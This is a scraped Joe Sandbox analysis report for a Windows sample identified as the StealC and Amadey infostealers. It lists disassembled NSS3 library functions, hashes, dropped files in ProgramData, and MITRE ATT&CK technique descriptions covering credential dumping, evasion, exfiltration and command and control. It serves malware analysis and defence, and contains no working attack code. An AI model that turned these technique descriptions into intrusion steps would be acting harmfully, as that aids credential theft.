Instruction Fuzzy Hash: 0EE065767006089FCA10EFA8DC44C8777BCEE4D2707150525E691C3741D231F955CBE1

Function 6CA99DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6CA99E1F

Part of subcall function 6CA513C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CA22352,?,00000000,?,?), ref: 6CA51413
Part of subcall function 6CA513C0: memcpy.VCRUNTIME140(00000000,6CA22352,00000002,?,?,?,?,6CA22352,?,00000000,?,?), ref: 6CA514C0

Strings

ESCAPE expression must be a single character, xrefs: 6CA99F78
LIKE or GLOB pattern too complex, xrefs: 6CA9A006

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: 4c73280eca706f0c42abfce04f26109497efc498deaad5c272e9b3c8e3d5d906
Instruction ID: c34bbb054c4612468ca2e289d5207d561aed867dac3e404651d20f70cd01a79d
Opcode Fuzzy Hash: 4c73280eca706f0c42abfce04f26109497efc498deaad5c272e9b3c8e3d5d906
Instruction Fuzzy Hash: 8481E474A143555FDB00CE39C2823AAB7F2AF45318F2C8659D8AD8BB81D736D8C6C791

Function 6CAF4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAF4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CAF4DE6

Strings

%d.%d, xrefs: 6CAF4DDE

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 12b13b8eae910f8c715f27fdb8dcfa90e5bd7bf051e2ff2f0ba770a2a3b9759e
Instruction ID: 9fae833de851fad1a0366938dc5423a251ff5d6210b9b8c899b8a728608c5aa2
Opcode Fuzzy Hash: 12b13b8eae910f8c715f27fdb8dcfa90e5bd7bf051e2ff2f0ba770a2a3b9759e
Instruction Fuzzy Hash: 4731D6B2D042586BEB109BA19D05BFF7768EF41308F050469FD659B781EB30994ACBA2

Function 6CB3AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6CB3AF78

Part of subcall function 6CA9ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA9ACE2
Part of subcall function 6CA9ACC0: malloc.MOZGLUE(00000001), ref: 6CA9ACEC
Part of subcall function 6CA9ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA9AD02
Part of subcall function 6CA9ACC0: TlsGetValue.KERNEL32 ref: 6CA9AD3C
Part of subcall function 6CA9ACC0: calloc.MOZGLUE(00000001,?), ref: 6CA9AD8C
Part of subcall function 6CA9ACC0: PR_Unlock.NSS3 ref: 6CA9ADC0
Part of subcall function 6CA9ACC0: PR_Unlock.NSS3 ref: 6CA9AE8C
Part of subcall function 6CA9ACC0: free.MOZGLUE(?), ref: 6CA9AEAB

memcpy.VCRUNTIME140(6CC03084,6CC002AC,00000090), ref: 6CB3AF94

Strings

SSL, xrefs: 6CB3AF73

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 3af72a0d5d990a96e8d94c45c32559164d7eabb2cdd6a2c41034773c2cb461f2
Instruction ID: bd0a535a22c5b4a5f638b7b708e4d31f3437767f6314a654dd2ab0d64ba27ef4
Opcode Fuzzy Hash: 3af72a0d5d990a96e8d94c45c32559164d7eabb2cdd6a2c41034773c2cb461f2
Instruction Fuzzy Hash: 38214FB2716EB89ADB00DF92A507B327A75B30270CB1A620DC50D4BB68D733404A9F95

Function 6CA90F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6CA90936,FFFFE8AE,?,6CA216B7,00000000,?,6CA90936,00000000,?,6CA2204A), ref: 6CA90F1B

Part of subcall function 6CA91370: GetSystemInfo.KERNEL32(?,?,?,?,6CA90936,?,6CA90F20,6CA90936,FFFFE8AE,?,6CA216B7,00000000,?,6CA90936,00000000), ref: 6CA9138F

PR_NewLogModule.NSS3(clock,6CA90936,FFFFE8AE,?,6CA216B7,00000000,?,6CA90936,00000000,?,6CA2204A), ref: 6CA90F25

Part of subcall function 6CA91110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6CA90936,00000001,00000040), ref: 6CA91130
Part of subcall function 6CA91110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA90936,00000001,00000040), ref: 6CA91142
Part of subcall function 6CA91110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA90936,00000001), ref: 6CA91167

Strings

clock, xrefs: 6CA90F20

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: d67c22a9cb5e07ff397482acb0f7f0992cd0979807c47c4822f5307cbb025100
Instruction ID: 8ad74a85ebcc07da2ecd3175ad4e27275d4d5e9fd6bb6e202394a8f9252e3434
Opcode Fuzzy Hash: d67c22a9cb5e07ff397482acb0f7f0992cd0979807c47c4822f5307cbb025100
Instruction Fuzzy Hash: 6FD0127571434465C51166979C86BB6B7FCC7C327DF11882AE20C41D104B6A50DFD269

Function 6CB00DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6CB00DF5
TlsGetValue.KERNEL32 ref: 6CB00E2D
TlsGetValue.KERNEL32 ref: 6CB00E58
TlsGetValue.KERNEL32 ref: 6CB00E84

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 18f787c7e1643de4eda393da927dce499a1bcb2cc32e2f8c325d84ba3cfe39f9
Instruction ID: 0510782ef36c87e31ab87d0c75e009b582c1333aba7258da91171e6182e11d5f
Opcode Fuzzy Hash: 18f787c7e1643de4eda393da927dce499a1bcb2cc32e2f8c325d84ba3cfe39f9
Instruction Fuzzy Hash: E531A1B0B547C1CBDB106F3CE9852697BB8FF0A348F11866DD89897A11EB359485CB82

Function 6CB00F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CAA2AF5,?,?,?,?,?,6CAA0A1B,00000000), ref: 6CB00F1A
malloc.MOZGLUE(00000001), ref: 6CB00F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CB00F42
TlsGetValue.KERNEL32 ref: 6CB00F5B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: f4496958b1220e15a9f896b4f94bd1121cf808aad3ab5bf036d57ac22a383c93
Instruction ID: 6bb7b903a42671d8fb12c59f4a2bbf1e00e9a68f9c0682e664d88cfcdea3f337
Opcode Fuzzy Hash: f4496958b1220e15a9f896b4f94bd1121cf808aad3ab5bf036d57ac22a383c93
Instruction Fuzzy Hash: 380124B1B006C05BEB102F3EAE4456A7FACEF52299B014165ED1CC3A21EB31C849C2E2

Function 6CAB1EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6CAB1ECE
free.MOZGLUE(?), ref: 6CAB1EDF
free.MOZGLUE(?), ref: 6CAB1EEF
free.MOZGLUE(?), ref: 6CAB1EF5

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 60d63393a0d0e272994483de433c96c92df3a69a658de83d0299e60376b53787
Instruction ID: 1ba2ebe80350c731ea48b81c45e690334795661b8c6164a69ea68177d8486d96
Opcode Fuzzy Hash: 60d63393a0d0e272994483de433c96c92df3a69a658de83d0299e60376b53787
Instruction Fuzzy Hash: C9F0B4B17001016BEB109B65EC49D37737CEF45694B180435ED19D3A00D735F4A0C6A1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BGCAFHCAKFBFIECAFIIJ

C:\ProgramData\DGHIDHCAAKECGCBFIJDBAAFBGH

C:\ProgramData\EBFBFBFIIJDAKECAKKJEHCFIJK

C:\ProgramData\EHJKFCGHIDHCBGDHJKEB

C:\ProgramData\FHDAFIID

C:\ProgramData\GHJDGDBF

C:\ProgramData\IECBAFCAAKJDHJKFIEBG

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

Windows Analysis Report
file.exe

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre